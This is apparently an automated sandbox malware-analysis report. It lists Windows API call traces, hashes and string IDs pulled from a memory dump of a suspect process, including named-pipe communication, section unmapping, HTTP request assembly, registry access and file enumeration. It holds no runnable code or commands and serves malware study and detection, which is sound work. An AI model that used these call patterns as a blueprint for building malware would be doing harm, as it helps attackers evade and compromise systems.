  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
